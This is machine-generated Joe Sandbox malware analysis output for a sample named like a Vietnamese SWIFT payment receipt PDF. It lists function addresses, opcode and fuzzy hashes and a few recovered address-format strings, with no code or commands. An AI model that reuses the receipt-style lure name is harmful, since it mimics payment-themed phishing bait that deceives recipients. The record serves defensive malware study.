Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa03c7dc01afe6a8ea7f7920926665b44233cc21d565e49fde517c59f936972b
Instruction ID: 917175f1ed1bd7f0f48707b0b4e213141096d1f9225454fd63bc47c2c7037d7a
Opcode Fuzzy Hash: fa03c7dc01afe6a8ea7f7920926665b44233cc21d565e49fde517c59f936972b
Instruction Fuzzy Hash: E20186706316C2ABE322E72CDD49B2977E8BB50B48F540164BB018B5EAE7A8D441C210

Function 0128437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: a9b22b9c1575da2a27b2f57090d41937202e5d88e1b19604f716134b4148f3ee
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: AFF0E935363D9357FB76BB2E9410B3EBA959FA0A00B25062C9711CB6C0DF60D9408780

Function 0126E872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction ID: 2e72f66214a7cd72ee534ab0bc3a9478d8350d805b26ba0e48281e5f923c496f
Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction Fuzzy Hash: 18F05E367316139BE721DA4ECC80F16B7ACAFD5A60F1B0069A7149B2B0C760EC82C7D0

Function 0126C89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b67fcb2f8232a94d61d3a7414df92cee02384c0969be97d014caddc4cafd774
Instruction ID: 2095a83dfd801642f6788ec4f50d30a541491f700f775370716c99cf2a82376a
Opcode Fuzzy Hash: 6b67fcb2f8232a94d61d3a7414df92cee02384c0969be97d014caddc4cafd774
Instruction Fuzzy Hash: 55F081706253449FC314EF28C445A1EB7E4EF98714F40465AB994DB390E634E900C796

Function 01210854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: 4a66748a96675d2ac7bd104f484502052b906792d9982537c0c07573b30a5a32
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: 15F02472620204EFE314DF22CC01F46B6E9EFAC344F158078AA44C7164FBB0DD40C658

Function 0126C912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a147ef4c894cf4cba66dda90134d98f65714a1dc63eaf4ed35ca125b9647f62f
Instruction ID: 100b58a025eb50216de7ada550eae75908eb9432931b998ae9c658f3ffa90eb0
Opcode Fuzzy Hash: a147ef4c894cf4cba66dda90134d98f65714a1dc63eaf4ed35ca125b9647f62f
Instruction Fuzzy Hash: 0DF06270A11249EFCB04EF69D515EAEB7B4FF18304F408059F955EB385DA78EA01CB64

Function 011E47FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24b0a786b21bc856889848bd034db946181d26c6cae170813739fc165c1424a5
Instruction ID: 5b8ab098b9d2ceb9076c22b384a2bad4b39715695dbb95c75aae2e55f4bafa88
Opcode Fuzzy Hash: 24b0a786b21bc856889848bd034db946181d26c6cae170813739fc165c1424a5
Instruction Fuzzy Hash: 36F0BE31916EE19FE73EDBECC09CF61BBD49B00664F0A896AD589C7D22C724D880C651

Function 012A0115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0e42cd04fd97746a4843fe62123a10a4c8d7ebdcdd35d50e44a6f576091312
Instruction ID: 94d1d81024414e595df399c6066622d2f14580eee93386e7037f8b71df3ecc02
Opcode Fuzzy Hash: 1b0e42cd04fd97746a4843fe62123a10a4c8d7ebdcdd35d50e44a6f576091312
Instruction Fuzzy Hash: E7F05C67C377C24BCF325B3CF8943E13F54A741214F491045D5A157205C574B483C728

Function 0121C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a3c64beecf022c4585984c815da47e73d71ba376a7ea1c477c81d439a5da94
Instruction ID: a0107e606bc761c871a65128e738dd75d857b1d15123b58372248060d01fbd08
Opcode Fuzzy Hash: 12a3c64beecf022c4585984c815da47e73d71ba376a7ea1c477c81d439a5da94
Instruction Fuzzy Hash: 3EF0E9799B15D29FD322D71CC184B5677D49BE07A4F09AC25D61A87616C360E850C650

Function 01222619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 14ba5e92894577ced1f5a8e31ec42741fa22fe3f20139a63966670db666c1bbd
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: 35E0D8723106117BE7219E598CC0F6B7B6EDFD2B14F04007DF6045F252CAE6DD1982A4

Function 01276030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: ace220f62880ca3021feeac75c9f42d99a07e8b13e73eb82690eda5afcf4fd38
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: AFF01C721246059FF7228F09D944B53BBB9FB15364F45C029E6099B561D379EC40CBA4

Function 011E0710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 39b8b0f3aeb5b92633d37ef97130d658ef3eca8e55a88e5d98cab53a9f2d7ed8
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 40F0E579714B41DBDB1ECF59C050AA97BE4FB55360B010054F9828B341E775E982CB51

Function 012149D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: c0f19a76f3d73f60fa98b3bba34c7a2040c2a4d509d158f7c4cee7dc97fde86d
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 8CE09B332641C59BD321BA598811B6676D597E47A0F170429E20887154DB70EC40C798

Function 012B4164 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f4538a6b2ab1e0a3ec19d51fd696d96c1d542f8e07163a8065f08897dc665a
Instruction ID: fd9afa6f05cf185bac87e9d0e7046471a0e46580db1b1c9b9381438b7ec81bfb
Opcode Fuzzy Hash: 68f4538a6b2ab1e0a3ec19d51fd696d96c1d542f8e07163a8065f08897dc665a
Instruction Fuzzy Hash: A3F0E531E365D28FE772E72CE2C0BD177E0AB107B0F1A0554D60687913C320DC41C650

Function 0128678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 0ee3fad152eed832755884cbe29c01646571b89f0f8c0457c02feafded55d7b1
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: FDE0DF32A41120BBEB25B7998D01F9ABEADDBA0FA0F050054B704E70D0E630DE00C6D0

Function 012B08C0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction ID: 43c4946f3a6375f35338b441deb24f2e967b1dde8fe762dc3bc078287ab1c499
Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction Fuzzy Hash: F8E09B316503518FCB268A1DD181AE3B7F8DF957A0F158479EE0547612C271F952C6D4

Function 011E25E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cacb54f9456e31dad6017f19d1e2d90dde8488d0896a618f05e6dbce15c020b5
Instruction ID: 8c1b6f8a92518ceb7e0d2749baf132b416a275d0dda3baecef0e5730814314c1
Opcode Fuzzy Hash: cacb54f9456e31dad6017f19d1e2d90dde8488d0896a618f05e6dbce15c020b5
Instruction Fuzzy Hash: C0E02232000950ABC325BF29DC05F9A77DAEB64364F010119F11557190CB30A800C7C4

Function 0129A456 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction ID: 39e910ec88e2b1c6ca41f074bd9aca1c94c6d49440eea97dc8e0c34e8c040867
Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction Fuzzy Hash: 1BE01231030752EFEB366F2ED958B667AE1FF50711F158C2DE296124B0C77598D1CA40

Function 01264000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: a3894844d26c658900697041ca18cbb19d4b296dbbf140860eda1958e8dc9fe1
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: CAE0C9343103568FE715DF19C040B627BBABFD5610F28C068A9888F345EB32E882CB40

Function 0121CA38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57d200e88d305fd16b330218d650cf977f9beda5bd1689342be5c14fa55f046c
Instruction ID: 0e7a2b3dcf840836bb2f3cac55253ad3e2fcb12f266ac2860a051fd1547d72ca
Opcode Fuzzy Hash: 57d200e88d305fd16b330218d650cf977f9beda5bd1689342be5c14fa55f046c
Instruction Fuzzy Hash: D8D02B334E10316ECB77F918BC08FE33ADD9B70260F014860F208D2015D554CCD186C4

Function 011D823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: 7645e5ccd29d4de9af666af2c0d1587c4cac0da7ddd8f5dee5af439a43b98adf
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: A5E0C231120A21EFDB3A2F1DDC00F6577B5FFA4B10F12482AE181064A48771AC82CB45

Function 011E2050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610c6324be0e161b20810d42cddfac6ac630726a14784557cbee7439423488b5
Instruction ID: fd7d230fe4c4a41b1a8c685a248529ebd8e386f8d2b4ec800d936e4203f78621
Opcode Fuzzy Hash: 610c6324be0e161b20810d42cddfac6ac630726a14784557cbee7439423488b5
Instruction Fuzzy Hash: E6E08C321008506BC615FA9DED10F5A739EEBA9664F010225B15097694CB24AC41C794

Function 01218A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 5cec15b22d8c44747b6f6a472d8d56ded5f3c992e89bbe050ac661fb9f057b41
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: C4E08C33121A188BC728EE18D562B72B7E8EF55720F09463EA62387784C634E944CB98

Function 01236AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: c6b54e2a277b68b8aad27738295b6a40d788f561370e6c909e39057beac28b66
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: 6BD05E36521A50AFC7329F1BEA00D13BBF9FBC4A10706062FA64583920C770A806CBA0

Function 0121E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 935449f1e9caad8ea16309071292f75babd3273a4492e83d801e9b62e8136d31
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: 0BD0A932224621ABDB72AA1CFC00FC333E8BB88764F06045AB118C7050C360AC82CA84

Function 0125E908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: 5960512df7ea11e5da6e443df8dfdae1990b3aaa6c6a421a64869d07d7a7759c
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: F8E0EC359606859BDF56DF99C684F5AFBF5BB94B40F160058A6085B660C734E901CB40

Function 011DA0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: b2838451153d26b68afca89d21887a9d56a31d410a4ea8effffb3b991482c056
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 51D0123332607197DF2D96657914F676919AF81A94F1B006D750A93944C6158C43D6E0

Function 0121A830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: 95f21e09026bbe81e19b5dbaeb2ea70adc2ef7c47b61a04219c8c08798dc2e4f
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: 74D022370E010DBBCB119F62CC01F903BA8E760BA0F004020B604870A0C63AE850C580

Function 0121CA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a056497406236a95ebe52468d9dbfa5d5b8de618ac20220a0c174a240ce4237d
Instruction ID: 58af618a0c96b65ce7bb26013d81cc1d6ce2a2b3c540f08b9bd5b2329ff82195
Opcode Fuzzy Hash: a056497406236a95ebe52468d9dbfa5d5b8de618ac20220a0c174a240ce4237d
Instruction Fuzzy Hash: ACD05E355B50028BDF1BCF09C550A3A3AB0EB20640B40006CEB4061424D368D811C640

Function 0121C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 548b27717eec74fcd3463a6ae806e618d0f671f7e40bc122addd6fd4f3750fcb
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: D5C08033150644AFC715DF95CD01F0177A9F798B40F010021F30447570C631FC11D644

Function 00416CEB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bcd9975a20d5b5212067cf8e08d1c6910c773f40d55ca02a99d03a03bbedd3
Instruction ID: e6a1fcf6a868967ace345d9f12a80fe9a541f047b4fc28353f99e9188280b30d
Opcode Fuzzy Hash: 07bcd9975a20d5b5212067cf8e08d1c6910c773f40d55ca02a99d03a03bbedd3
Instruction Fuzzy Hash: BEA01213E470084050300C683840078F334D1C3035D0877A7DD0C735500443C41000CD

Function 01200310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: c53cfef28ee8ea9daf8b7dd80f788b23ad4196fb03e73626d496c9ab14cff46e
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 4BD01236110248EFCB02DF41C890EAA772AFBD8750F108019FD1907651CA31ED62DA50

Function 011E0750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 5488f43e327ccd2c3164f057721b6414de580d31bb45be12fe393f3ee30863c4
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: DDC04C757215428FCF15DB19D294F4977E4F744754F150890E905CB721E724E805CA10

Function 01222890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0122293C
___swprintf_l.LIBCMT ref: 0122295E
___swprintf_l.LIBCMT ref: 012229A3
___swprintf_l.LIBCMT ref: 0125A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0125A527
:%u.%u.%u.%u, xrefs: 0125A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 0125A54E
ffff:, xrefs: 0125A504

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 384b6c2e69446a6aebbac510c708312de538bf43d7b6198b917961ec82b616dc
Instruction ID: 441c4da549bc2efa7c4823e1754f6198e3a0e6455cd7d5a356ac401a31df0fac
Opcode Fuzzy Hash: 384b6c2e69446a6aebbac510c708312de538bf43d7b6198b917961ec82b616dc
Instruction Fuzzy Hash: 2451F4B2B20127BFCB25DFAC89C197EFBB8BB482407548229F5A5D7641D375DE0087A1

Function 01292410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 012924A6
___swprintf_l.LIBCMT ref: 012924E2
___swprintf_l.LIBCMT ref: 0129257D
___swprintf_l.LIBCMT ref: 012925A3
___swprintf_l.LIBCMT ref: 012925C8
___swprintf_l.LIBCMT ref: 01292608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 012924DA
::%hs%u.%u.%u.%u, xrefs: 0129249E
:%u.%u.%u.%u, xrefs: 012925FF
ffff:, xrefs: 0129247D, 0129249D

Memory Dump Source

